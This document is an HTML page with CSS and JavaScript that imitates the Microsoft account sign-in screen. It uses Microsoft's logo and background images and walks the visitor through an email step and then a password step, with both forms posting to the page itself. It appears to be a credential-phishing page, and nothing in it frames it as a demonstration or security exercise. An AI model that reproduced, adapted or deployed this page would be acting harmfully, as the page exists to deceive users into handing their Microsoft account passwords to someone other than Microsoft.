<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
@font-face {font-family: "Segoe UI Semibold"; src: url("//db.onlinewebfonts.com/t/d4d6e1a6527a21185217393c427a52cb.eot"); src: url("//db.onlinewebfonts.com/t/d4d6e1a6527a21185217393c427a52cb.eot?#iefix") format("embedded-opentype"), url("//db.onlinewebfonts.com/t/d4d6e1a6527a21185217393c427a52cb.woff2") format("woff2"), url("//db.onlinewebfonts.com/t/d4d6e1a6527a21185217393c427a52cb.woff") format("woff"), url("//db.onlinewebfonts.com/t/d4d6e1a6527a21185217393c427a52cb.ttf") format("truetype"), url("//db.onlinewebfonts.com/t/d4d6e1a6527a21185217393c427a52cb.svg#Segoe UI Semibold") format("svg"); }
body {font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif,Arial, Helvetica, sans-serif;
    background: url("https://logincdn.msauth.net/16.000.28345.6/images/Backgrounds/0.jpg?x=a5dbd4393ff6a725c7e62b61df7e72f0")
}

/* Full-width input fields */
input[type=text], input[type=password] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  box-sizing: border-box;
}

.signintxt{
    font-size: 24px;
    font-weight: 600;
    line-height: 24px;
}

/* Set a style for all buttons */
button {
  background-color: #0067b8;
  border-color: #0067b8;
  color: #fff;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 30%;
  height:40px;
  float: right;
}
.email{
    border: 0px solid #666 !important;
    border-bottom: 1px solid #666 !important;
}


.logintxt a:visited{
    color: #0067b8;
}
#loginvaladitionmsg{
    display: none;
    color: red;
}
.logintxt a:link{
    color: #0067b8;
}
.logintxt a{
    text-decoration: none;
}
button:hover {
  opacity: 0.8;
}

.logintxt{
    margin-bottom: 16px;
}

/* Center the image and position the close button */
.imgcontainer {
  text-align: center;
  margin: 24px 0 12px 0;
  position: relative;
}

img.avatar {
  width: 40%;
  border-radius: 50%;
}

.container {
  padding: 16px;
}

span.psw {
  float: right;
  padding-top: 16px;
}

/* The Modal (background) */
.modal {
  display: block; /* Hidden by default */
  position: fixed; /* Stay in place */
  z-index: 1; /* Sit on top */
  left: 0;
  top: 0;
  width: 100%; /* Full width */
  height: 100%; /* Full height */
  overflow: auto; /* Enable scroll if needed */
  background-color: rgb(0,0,0); /* Fallback color */
  background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
  padding-top: 10%;
}

/* Modal Content/Box */
.modal-content {
    margin-left: auto;
    margin-right: auto;
    position: relative;
    max-width: 440px;
    width: calc(100% - 40px);
    padding: 44px;
    margin-bottom: 28px;
    background-color: #fff;
    -webkit-box-shadow: 0 2px 6px rgba(0,0,0,.2);
    -moz-box-shadow: 0 2px 6px rgba(0,0,0,.2);
    box-shadow: 0 2px 6px rgba(0,0,0,.2);
    min-width: 320px;
    min-height: 338px;
    overflow: hidden;/* Could be more or less, depending on screen size */
}

/* The Close Button (x) */
.close {
  position: absolute;
  right: 25px;
  top: 0;
  color: #000;
  font-size: 35px;
  font-weight: bold;
}

.close:hover,
.close:focus {
  color: red;
  cursor: pointer;
}

/* Add Zoom Animation */
.animate {
  -webkit-animation: animatezoom 0.6s;
  animation: animatezoom 0.6s
}

@-webkit-keyframes animatezoom {
  from {-webkit-transform: scale(0)} 
  to {-webkit-transform: scale(1)}
}
  
@keyframes animatezoom {
  from {transform: scale(0)} 
  to {transform: scale(1)}
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
  .cancelbtn {
     width: 100%;
  }
}
</style>

</head>
<body>




<div id="id01" class="modal">
  
  <form class="modal-content animate"  method="post">
    

    <div class="container">

      <img src="https://logincdn.msauth.net/16.000.28345.6/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd" alt=""> 
      <br><br>
      <label class="signintxt" for="uname">Sign in</label> <br><br>
      <p id="loginvaladitionmsg">Enter a valid email address.</p>
      <input  id = "loginEmail" class="email" type="text" placeholder="Enter Username" name="uname" required>

      <p class="logintxt">no account?<a href="" target="_blank" > Create one!</a></p>
      <p  class="logintxt"><a href="">Sign in with a security key</a></p>
      <p  class="logintxt"><a href="">Sign-in options</a></p>

      
        
      <button  onclick="nextBtn()">Next</button>
      </div>
     
    </form>>
</div> 


<div id="id02" class="modal">
  
        
        <form class="modal-content animate"  method="post">
      
          <div class="container">
      
            <img src="https://logincdn.msauth.net/16.000.28345.6/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd" alt=""> 
            <br><br>
            <label class="signintxt" for="uname">Enter password</label> <br><br>
            <input class="password" type="text" placeholder="Password" name="uname" required>
      
            <input type="checkbox">Keep me signed in
            <p  class="logintxt"><a href="">Forgotten your password?</a></p>
            <p  class="logintxt"><a href="">Sign in with a security key</a></p>

      
            
              
            <button type="submit" id="loginBtn" onclick="">Sign</button>
            </div>
        </form>
      </div>
<script>
// Get the modal
var modal = document.getElementById('id01');
var passmodal =  document.getElementById('id02');
passmodal.style.display = "none";

// When the user clicks anywhere outside of the modal, close it


function nextBtn(){
   event.preventDefault();
    var email = document.getElementById("loginEmail").value;
    if(email != "" ){
    modal.style.display = "none";
    passmodal.style.display = "block";
}else{
document.getElementById("loginvaladitionmsg").style.display = "block";
}

}
</script>

</body>
</html>
